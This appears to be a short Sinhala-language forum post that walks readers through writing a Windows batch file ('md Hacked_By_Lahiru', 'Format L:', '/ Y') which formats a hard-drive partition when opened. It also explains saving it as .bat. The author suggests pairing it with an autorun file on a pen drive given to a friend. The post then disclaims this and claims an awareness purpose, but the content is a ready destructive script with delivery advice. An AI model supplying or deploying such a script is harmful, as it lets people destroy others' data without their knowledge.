මේක කියන්නෙ දෑන ගන්න ඔනෙ නිසා හැමොම,  මේක Partition එකක් ෆුල්ම ෆොර්මෑට් කරල දාන්න පුලුවන් වැඩක්, 
මේක හොදටම වැඩනම් XP වලට, දන්නෙ නැති කෙනෙක්ගෙ උනත් Win7 වලට උනත් මෙහෙම කරල Hard එකෙ Partition එකක් ෆුල් Format එකක් දෙන්න පුලුවන්,  මේක දාන්නෙ ඔයලගෙ දෑනුමට, මෙහෙම දේවල්වලින් ආරක්ෂා වෙන්න, මුලින්ම Notepad එක Open කර ගන්න ඊට පස්සෙ මේක Copy —> Paste කර ගන්න.
md Hacked_By_Lahiru
Format L:
/ Y Enter
Lahiru කියන එක වෙනුවට ඔයාලගෙ නම එතනට දෙන්න පුලුවන් Format L කියන තෑනට C partition එක වෙනුවට කෑමති එකක් දෙන්න පුලුවන්,  මේක D එක එහෙම දාල බලන්නකො හේහේ, ඊට පස්සෙ  මේක Save කර ගන්න ඔනෙ Save as ගිහින් එතන කෑමති නමක් එකක් දීල අවසානේට .bat කියල දෙන්න, Save as type කියන තෑන All Files දෙන්න, ඊට පස්සෙ Save කරන්න, දෑන්  මේක Open කරන්න එහෙම එපා මචො, දාපු Partition එක Format වෙලාම යාවි, දැන්  මේකට පොඩි Auto Run File එකක් ලියල Pen එකකට වගෙ දාල යාලුවෙකුට දුන්නනම් මල කෙලියයි, එහෙම කරන්න එපා මොකද අපි කරන නරක වැඩ මේ ලොකෙ දෙවියො ස්වබාව ධර්මය බලන් ඉන්නව,  මේක ඔයලගෙ  ආරක්ෂාවට කියල දුන්නෙ, සමහර විට මේක ගොඩක් අය දන්නවත් ඇති, එත් නොදන්න අය  ආරක්ෂා වෙන්න ඔනේ,, එක නිසයි දෑම්මෙ, නරක වෑඩ කවදාවත් හොද නැ දැනුමටම විතරයි  මේක,

 
Top